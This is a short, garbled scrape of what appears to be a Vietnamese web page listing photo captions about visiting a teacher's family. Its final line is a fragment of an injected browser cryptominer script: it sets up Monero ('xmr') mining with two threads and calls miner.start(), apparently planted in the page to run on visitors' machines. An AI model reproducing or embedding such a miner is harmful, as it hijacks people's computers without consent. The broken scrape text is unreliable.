THĂM VIẾNG GIA ĐÌNH THẦY LÂM THÀNH NGHIÊM
THĂM GIA ĐÌNH THẦY LÂM THÀNH NGHIÊM 3
THĂM VIẾNG GIA ĐÌNH THẦY LÂM THÀNH NGHIÊM 2
THĂM VIẾNG GIA ĐÌNH THẦY LÂM THÀNH NGHIÊM 1
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();